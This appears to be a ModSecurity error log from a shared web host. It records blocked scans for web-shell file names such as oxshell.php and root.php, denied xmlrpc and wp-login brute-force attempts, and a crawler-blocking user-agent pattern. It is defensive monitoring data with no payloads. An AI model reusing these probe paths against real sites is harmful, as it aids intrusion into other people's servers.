[Tue May 26 15:47:29.482223 2026] [security2:error] [pid 747840:tid 748097] [client 4.193.189.92:12350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/f35.php"] [unique_id "ahVzOYm6MwAuYuZKxvnm1QAAAYk"]
[Tue May 26 15:47:30.242251 2026] [security2:error] [pid 747840:tid 748083] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzOYm6MwAuYuZKxvnm3wAAAXs"]
[Tue May 26 15:47:30.244416 2026] [security2:error] [pid 745492:tid 745627] [client 4.193.189.92:8460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/fff.php"] [unique_id "ahVzOomEQglTmoWcfxJ01AAAAIc"]
[Tue May 26 15:47:30.977353 2026] [security2:error] [pid 745492:tid 745685] [client 4.193.189.92:5574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/ff1.php"] [unique_id "ahVzOomEQglTmoWcfxJ03wAAAME"]
[Tue May 26 15:47:31.695296 2026] [security2:error] [pid 747840:tid 748046] [client 85.208.222.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzO4m6MwAuYuZKxvnm8gAAAVY"]
[Tue May 26 15:47:31.732922 2026] [security2:error] [pid 747840:tid 747997] [client 4.193.189.92:6101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/flower.php"] [unique_id "ahVzO4m6MwAuYuZKxvnm-gAAASU"]
[Tue May 26 15:47:32.054084 2026] [security2:error] [pid 747840:tid 748075] [client 157.90.155.240:42190] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVzO4m6MwAuYuZKxvnm9AAAAXM"], referer: http://ucdc.co.in/
[Tue May 26 15:47:32.485880 2026] [security2:error] [pid 747840:tid 747974] [client 4.193.189.92:10939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/file.php"] [unique_id "ahVzPIm6MwAuYuZKxvnnDwAAAQ4"]
[Tue May 26 15:47:32.639939 2026] [security2:error] [pid 747840:tid 748027] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzPIm6MwAuYuZKxvnnBwAAAUM"]
[Tue May 26 15:47:33.246318 2026] [security2:error] [pid 747840:tid 748055] [client 4.193.189.92:10885] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/goods.php"] [unique_id "ahVzPYm6MwAuYuZKxvnnGwAAAV8"]
[Tue May 26 15:47:34.042640 2026] [security2:error] [pid 747840:tid 748015] [client 4.193.189.92:10097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/g.php"] [unique_id "ahVzPom6MwAuYuZKxvnnKwAAATc"]
[Tue May 26 15:47:34.817019 2026] [security2:error] [pid 745492:tid 745646] [client 4.193.189.92:2515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/hplfuns.php"] [unique_id "ahVzPomEQglTmoWcfxJ08wAAAJo"]
[Tue May 26 15:47:35.301199 2026] [security2:error] [pid 747840:tid 748025] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzPom6MwAuYuZKxvnnNgAAAUE"]
[Tue May 26 15:47:35.588691 2026] [security2:error] [pid 747840:tid 748071] [client 4.193.189.92:11240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/ioxi-o.php"] [unique_id "ahVzP4m6MwAuYuZKxvnnSAAAAW8"]
[Tue May 26 15:47:36.356030 2026] [security2:error] [pid 747840:tid 748051] [client 4.193.189.92:11601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/in.php"] [unique_id "ahVzQIm6MwAuYuZKxvnnVQAAAVs"]
[Tue May 26 15:47:36.581172 2026] [security2:error] [pid 747840:tid 747978] [client 223.123.35.44:36218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzQIm6MwAuYuZKxvnnVAAAARI"]
[Tue May 26 15:47:36.581319 2026] [security2:error] [pid 747840:tid 747978] [client 223.123.35.44:36218] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzQIm6MwAuYuZKxvnnVAAAARI"]
[Tue May 26 15:47:37.083301 2026] [security2:error] [pid 747840:tid 747995] [client 143.110.243.118:46858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/5fesj.php"] [unique_id "ahVzQYm6MwAuYuZKxvnnYQAAASM"]
[Tue May 26 15:47:37.158271 2026] [security2:error] [pid 747840:tid 748096] [client 4.193.189.92:9983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/info.php"] [unique_id "ahVzQYm6MwAuYuZKxvnnYwAAAYg"]
[Tue May 26 15:47:37.354814 2026] [security2:error] [pid 745492:tid 745687] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzQImEQglTmoWcfxJ1CAAAAMM"]
[Tue May 26 15:47:37.942952 2026] [security2:error] [pid 745492:tid 745746] [client 4.193.189.92:10935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/inputs.php"] [unique_id "ahVzQYmEQglTmoWcfxJ1DwAAAP4"]
[Tue May 26 15:47:38.232818 2026] [security2:error] [pid 747840:tid 748050] [client 103.153.130.62:63517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzQom6MwAuYuZKxvnncwAAAVo"]
[Tue May 26 15:47:38.232934 2026] [security2:error] [pid 747840:tid 748050] [client 103.153.130.62:63517] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzQom6MwAuYuZKxvnncwAAAVo"]
[Tue May 26 15:47:38.631201 2026] [security2:error] [pid 745492:tid 745719] [client 95.164.245.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzQomEQglTmoWcfxJ1GgAAAOM"], referer: https://www.anujtradingco.com/
[Tue May 26 15:47:38.770276 2026] [security2:error] [pid 745492:tid 745642] [client 4.193.189.92:11604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/item.php"] [unique_id "ahVzQomEQglTmoWcfxJ1IQAAAJY"]
[Tue May 26 15:47:39.497311 2026] [security2:error] [pid 745492:tid 745748] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzQ4mEQglTmoWcfxJ1KQAAAQA"]
[Tue May 26 15:47:39.556889 2026] [security2:error] [pid 745492:tid 745693] [client 4.193.189.92:4318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/k.php"] [unique_id "ahVzQ4mEQglTmoWcfxJ1PAAAAMk"]
[Tue May 26 15:47:39.560115 2026] [security2:error] [pid 745492:tid 745640] [client 95.164.245.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzQ4mEQglTmoWcfxJ1OAAAAJQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 15:47:40.385409 2026] [security2:error] [pid 747840:tid 747999] [client 4.193.189.92:2813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/license.php"] [unique_id "ahVzRIm6MwAuYuZKxvnngAAAASc"]
[Tue May 26 15:47:40.568949 2026] [security2:error] [pid 745492:tid 745730] [client 143.110.243.118:46516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/s46v1.php"] [unique_id "ahVzRImEQglTmoWcfxJ1RQAAAO4"]
[Tue May 26 15:47:41.138386 2026] [security2:error] [pid 745492:tid 745718] [client 4.193.189.92:10886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/load.php"] [unique_id "ahVzRYmEQglTmoWcfxJ1TwAAAOI"]
[Tue May 26 15:47:41.452346 2026] [security2:error] [pid 745492:tid 745735] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzRYmEQglTmoWcfxJ1TAAAAPM"]
[Tue May 26 15:47:41.956038 2026] [security2:error] [pid 745492:tid 745648] [client 4.193.189.92:4296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/manager.php"] [unique_id "ahVzRYmEQglTmoWcfxJ1ZAAAAJw"]
[Tue May 26 15:47:42.694000 2026] [security2:error] [pid 747840:tid 748059] [client 4.193.189.92:9013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/media.php"] [unique_id "ahVzRom6MwAuYuZKxvnnnAAAAWM"]
[Tue May 26 15:47:43.488259 2026] [security2:error] [pid 747840:tid 748050] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzR4m6MwAuYuZKxvnnpgAAAVo"]
[Tue May 26 15:47:43.508256 2026] [security2:error] [pid 745492:tid 745635] [client 4.193.189.92:10036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/mar.php"] [unique_id "ahVzR4mEQglTmoWcfxJ1igAAAI8"]
[Tue May 26 15:47:44.301240 2026] [security2:error] [pid 747840:tid 748056] [client 4.193.189.92:11404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/my1.php"] [unique_id "ahVzSIm6MwAuYuZKxvnntgAAAWA"]
[Tue May 26 15:47:45.076010 2026] [security2:error] [pid 747840:tid 748049] [client 4.193.189.92:2799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/mm.php"] [unique_id "ahVzSYm6MwAuYuZKxvnnwgAAAVk"]
[Tue May 26 15:47:45.611296 2026] [security2:error] [pid 745492:tid 745639] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzSYmEQglTmoWcfxJ1mwAAAJM"]
[Tue May 26 15:47:45.846134 2026] [security2:error] [pid 747840:tid 748057] [client 4.193.189.92:5139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/network.php"] [unique_id "ahVzSYm6MwAuYuZKxvnn1AAAAWE"]
[Tue May 26 15:47:46.621200 2026] [security2:error] [pid 747840:tid 748035] [client 4.193.189.92:5617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/new.php"] [unique_id "ahVzSom6MwAuYuZKxvnn3QAAAUs"]
[Tue May 26 15:47:47.129530 2026] [security2:error] [pid 747840:tid 748091] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzSom6MwAuYuZKxvnn4AAAAYM"]
[Tue May 26 15:47:47.404955 2026] [security2:error] [pid 745492:tid 745631] [client 4.193.189.92:3701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/0x.php"] [unique_id "ahVzS4mEQglTmoWcfxJ1twAAAIs"]
[Tue May 26 15:47:48.191410 2026] [security2:error] [pid 747840:tid 748026] [client 4.193.189.92:10997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/0.php"] [unique_id "ahVzTIm6MwAuYuZKxvnn7wAAAUI"]
[Tue May 26 15:47:48.512042 2026] [security2:error] [pid 747840:tid 748060] [client 103.153.130.62:63809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzTIm6MwAuYuZKxvnn9AAAAWQ"]
[Tue May 26 15:47:48.512467 2026] [security2:error] [pid 747840:tid 748060] [client 103.153.130.62:63809] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzTIm6MwAuYuZKxvnn9AAAAWQ"]
[Tue May 26 15:47:49.004051 2026] [security2:error] [pid 747840:tid 748081] [client 4.193.189.92:6274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/oxshell.php"] [unique_id "ahVzTYm6MwAuYuZKxvnoAAAAAXk"]
[Tue May 26 15:47:49.754875 2026] [security2:error] [pid 747840:tid 748004] [client 4.193.189.92:2803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/php8.php"] [unique_id "ahVzTYm6MwAuYuZKxvnoDAAAASw"]
[Tue May 26 15:47:49.919504 2026] [security2:error] [pid 745492:tid 745671] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzTYmEQglTmoWcfxJ1ygAAALM"]
[Tue May 26 15:47:50.525816 2026] [security2:error] [pid 745492:tid 745749] [client 4.193.189.92:5603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/p.php"] [unique_id "ahVzTomEQglTmoWcfxJ11QAAAQE"]
[Tue May 26 15:47:50.877457 2026] [security2:error] [pid 747840:tid 747976] [client 143.110.243.118:49598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/djfksr4.php"] [unique_id "ahVzTom6MwAuYuZKxvnoGwAAARA"]
[Tue May 26 15:47:51.121213 2026] [security2:error] [pid 747840:tid 748074] [client 114.119.157.214:46273] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "omshriinfrastructures.com"] [uri "/interiors.html"] [unique_id "ahVzT4m6MwAuYuZKxvnoIgAAAXI"], referer: https://omshriinfrastructures.com
[Tue May 26 15:47:51.307349 2026] [security2:error] [pid 747840:tid 747993] [client 4.193.189.92:2790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/php.php"] [unique_id "ahVzT4m6MwAuYuZKxvnoKAAAASE"]
[Tue May 26 15:47:51.684282 2026] [security2:error] [pid 747840:tid 748048] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzT4m6MwAuYuZKxvnoJAAAAVg"]
[Tue May 26 15:47:52.059417 2026] [security2:error] [pid 747840:tid 748010] [client 4.193.189.92:9303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/past.php"] [unique_id "ahVzUIm6MwAuYuZKxvnoMAAAATI"]
[Tue May 26 15:47:52.822408 2026] [security2:error] [pid 747840:tid 748064] [client 4.193.189.92:10881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/root.php"] [unique_id "ahVzUIm6MwAuYuZKxvnoNgAAAWg"]
[Tue May 26 15:47:53.599200 2026] [security2:error] [pid 745492:tid 745658] [client 4.193.189.92:2555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/r.php"] [unique_id "ahVzUYmEQglTmoWcfxJ2CwAAAKY"]
[Tue May 26 15:47:54.058100 2026] [security2:error] [pid 745492:tid 745689] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzUYmEQglTmoWcfxJ2DQAAAMU"]
[Tue May 26 15:47:54.395279 2026] [security2:error] [pid 745492:tid 745656] [client 4.193.189.92:5442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/sid3.php"] [unique_id "ahVzUomEQglTmoWcfxJ2GgAAAKQ"]
[Tue May 26 15:47:55.176968 2026] [security2:error] [pid 747840:tid 748053] [client 4.193.189.92:9326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/ss.php"] [unique_id "ahVzU4m6MwAuYuZKxvnoTgAAAV0"]
[Tue May 26 15:47:55.340224 2026] [security2:error] [pid 747840:tid 747968] [remote 51.79.254.190:60140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.254.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVzU4m6MwAuYuZKxvnoUAABKH8"]
